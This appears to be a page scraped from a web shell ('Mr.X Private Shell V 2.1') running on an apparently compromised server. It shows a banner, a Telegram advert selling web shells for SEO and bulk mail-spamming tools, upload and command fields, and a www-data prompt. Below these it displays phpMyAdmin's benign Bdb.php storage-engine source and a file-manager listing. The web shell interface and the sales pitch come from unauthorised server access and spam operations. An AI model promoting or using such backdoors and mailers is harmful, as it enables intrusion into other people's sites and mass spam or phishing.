__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
/**
 * The BDB storage engine
 */

declare(strict_types=1);

namespace PhpMyAdmin\Engines;

use PhpMyAdmin\StorageEngine;

use function __;

/**
 * The BDB storage engine
 */
class Bdb extends StorageEngine
{
    /**
     * Returns array with variable names related to this storage engine
     *
     * @return array   variable names
     */
    public function getVariables()
    {
        return [
            'version_bdb' => [
                'title' => __('Version information'),
            ],
            'bdb_cache_size' => ['type' => StorageEngine::DETAILS_TYPE_SIZE],
            'bdb_home' => [],
            'bdb_log_buffer_size' => ['type' => StorageEngine::DETAILS_TYPE_SIZE],
            'bdb_logdir' => [],
            'bdb_max_lock' => ['type' => StorageEngine::DETAILS_TYPE_NUMERIC],
            'bdb_shared_data' => [],
            'bdb_tmpdir' => [],
            'bdb_data_direct' => [],
            'bdb_lock_detect' => [],
            'bdb_log_direct' => [],
            'bdb_no_recover' => [],
            'bdb_no_sync' => [],
            'skip_sync_bdb_logs' => [],
            'sync_bdb_logs' => [],
        ];
    }

    /**
     * Returns the pattern to be used in the query for SQL variables
     * related to this storage engine
     *
     * @return string LIKE pattern
     */
    public function getVariablesLikePattern()
    {
        return '%bdb%';
    }

    /**
     * returns string with filename for the MySQL helppage
     * about this storage engine
     *
     * @return string  mysql helppage filename
     */
    public function getMysqlHelpPage()
    {
        return 'bdb';
    }
}

Filemanager

Name Type Size Permission Actions
Bdb.php File 1.6 KB 0644
Berkeleydb.php File 169 B 0644
Binlog.php File 458 B 0644
Innobase.php File 176 B 0644
Innodb.php File 12.5 KB 0644
Memory.php File 517 B 0644
Merge.php File 205 B 0644
MrgMyisam.php File 422 B 0644
Myisam.php File 3.1 KB 0644
Ndbcluster.php File 984 B 0644
Pbxt.php File 6.94 KB 0644
PerformanceSchema.php File 493 B 0644
Filemanager